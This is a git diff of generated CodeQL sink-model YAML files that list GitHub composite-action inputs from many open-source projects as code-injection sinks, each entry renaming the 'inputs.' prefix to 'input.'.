diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index dc48b2e8d20..1819f4f716e 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chipsalliance/chisel", "*", "inputs.version", "code-injection", "generated"] - - ["chipsalliance/chisel", "*", "inputs.file-name", "code-injection", "generated"] \ No newline at end of file + - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index b46b5592ac5..620100dd2d9 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chocobozzz/peertube", "*", "inputs.deployKey", "code-injection", "generated"] - - ["chocobozzz/peertube", "*", "inputs.knownHosts", "code-injection", "generated"] \ No newline at end of file + - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index a38482ba696..dfb08d26058 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cilium/cilium-cli", "*", "inputs.binary-name", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.binary-dir", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.ci-version", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.release-version", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.repository", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.go-mod-directory", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.local-path", "code-injection", "generated"] \ No newline at end of file + - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.local-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index ca1bf2f894f..a99ccc9e477 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cilium/cilium", "*", "inputs.job-name", "code-injection", "generated"] - - ["cilium/cilium", "*", "inputs.lb-acceleration", "code-injection", "generated"] - - ["cilium/cilium", "*", "inputs.mutual-auth", "code-injection", "generated"] \ No newline at end of file + - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 4a46ca788e5..3a1e7b9d336 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["citusdata/citus", "*", "inputs.flags", "code-injection", "generated"] - - ["citusdata/citus", "*", "inputs.pg_major", "code-injection", "generated"] - - ["citusdata/citus", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index b1c5270165b..c15c1fac006 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["clerk/javascript", "*", "inputs.auth-email", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.auth-password", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.auth-user", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.registry", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.publish-cmd", "code-injection", "generated"] \ No newline at end of file + - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 9fcaa3fff76..b0c787fa378 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloud-custodian/cloud-custodian", "*", "inputs.poetry-version", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.bucket-url", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.docs-dir", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index f21c3c1f9de..86278889fdf 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudflare/workers-sdk", "*", "inputs.package-manager", "code-injection", "generated"] \ No newline at end of file + - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 7ff68860cf8..4bf92a25123 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudfoundry/cloud_controller/ng", "*", "inputs.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 9e3d5bd41e3..79c13504fab 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coder/coder", "*", "inputs.api-key", "code-injection", "generated"] \ No newline at end of file + - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 63373bd78a7..45ac61c8ef9 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coil-kt/coil", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 529614b8d79..ce546fceb4b 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["commaai/openpilot", "*", "inputs.sleep_time", "code-injection", "generated"] - - ["commaai/openpilot", "*", "inputs.docker_hub_pat", "code-injection", "generated"] - - ["commaai/openpilot", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index ce3ce91d773..b34c6d46da3 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["conan-io/conan-center-index", "*", "inputs.files", "code-injection", "generated"] - - ["conan-io/conan-center-index", "*", "inputs.reviewers", "code-injection", "generated"] \ No newline at end of file + - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index ececaa835e9..f87e0c02529 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["corretto/corretto-8", "*", "inputs.version-branch", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.upstream", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.merge-branch", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.local-branch", "code-injection", "generated"] \ No newline at end of file + - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.local-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 0c19019e4f3..88348f05cd0 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cosmos/cosmos-sdk", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file + - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 67a21fc2e86..76fe3bed472 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coturn/coturn", "*", "inputs.SUDO", "code-injection", "generated"] \ No newline at end of file + - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index 3f0c5e645de..bf1a498d7a0 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crunchydata/postgres-operator", "*", "inputs.k3s-channel", "code-injection", "generated"] \ No newline at end of file + - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 470109b5e85..b985d87f7e1 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cvc5/cvc5", "*", "inputs.build-dir", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.macos-target", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-examples", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-python-bindings", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-install", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.regressions-exclude", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.strip-bin", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.configure-config", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.configure-env", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 5ffefd58e53..8e7cdd0308c 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["d2l-ai/d2l-en", "*", "inputs.command", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.work-dir", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.job-name", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file + - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 742e1876811..cf30d0d19cc 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.clean-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.deploy-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.wait-between-retries", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.retries-on-failure", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.check-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.build-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.pre-build-command", "code-injection", "generated"] \ No newline at end of file + - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 97c75ae6f5c..5414a755179 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-dotnet", "*", "inputs.command", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.baseImage", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.aas_github_token", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.artifacts_path", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index fa98e84315d..97a3bfa026e 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-go", "*", "inputs.files", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.tags", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.service", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.dd-api-key", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 3bc48b644d0..81672e85557 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-js", "*", "inputs.container-id", "code-injection", "generated"] - - ["datadog/dd-trace-js", "*", "inputs.init-image-version", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index 81e07943026..b4fdfaf273d 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datafuselabs/databend", "*", "inputs.dataset", "code-injection", "generated"] - - ["datafuselabs/databend", "*", "inputs.dirs", "code-injection", "generated"] \ No newline at end of file + - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index a1fdb476748..6f1043073d8 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["davatorium/rofi", "*", "inputs.logfile", "code-injection", "generated"] - - ["davatorium/rofi", "*", "inputs.windowmode", "code-injection", "generated"] - - ["davatorium/rofi", "*", "inputs.cc", "code-injection", "generated"] \ No newline at end of file + - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index 5744f3e7495..f9244c44858 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["debezium/debezium", "*", "inputs.path-core", "code-injection", "generated"] \ No newline at end of file + - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 852e39799d9..36332c5678d 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["defenseunicorns/zarf", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index a0d7eb51354..c246e5de06f 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "inputs.results_path", "code-injection", "generated"] \ No newline at end of file + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 8d10d22cd5c..13c0093fe4a 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["department-of-veterans-affairs/vets-website", "*", "inputs.delimiter", "code-injection", "generated"] \ No newline at end of file + - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index c99c630853e..49b226de1e8 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["devexpress/devextreme", "*", "inputs.name", "code-injection", "generated"] - - ["devexpress/devextreme", "*", "inputs.result", "code-injection", "generated"] - - ["devexpress/devextreme", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 8554ebec65f..9a6e0b88ba2 100644 
--- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["diggerhq/digger", "*", "inputs.checkov-version", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-auth-credentials", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-workload-identity-provider", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-service-account", "code-injection", "generated"] \ No newline at end of file + - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 6f0878a77cb..4f88855a561 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["diku-dk/futhark", "*", "inputs.script", "code-injection", "generated"] - - ["diku-dk/futhark", "*", "inputs.slurm-options", "code-injection", "generated"] \ No newline at end of file + - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file 
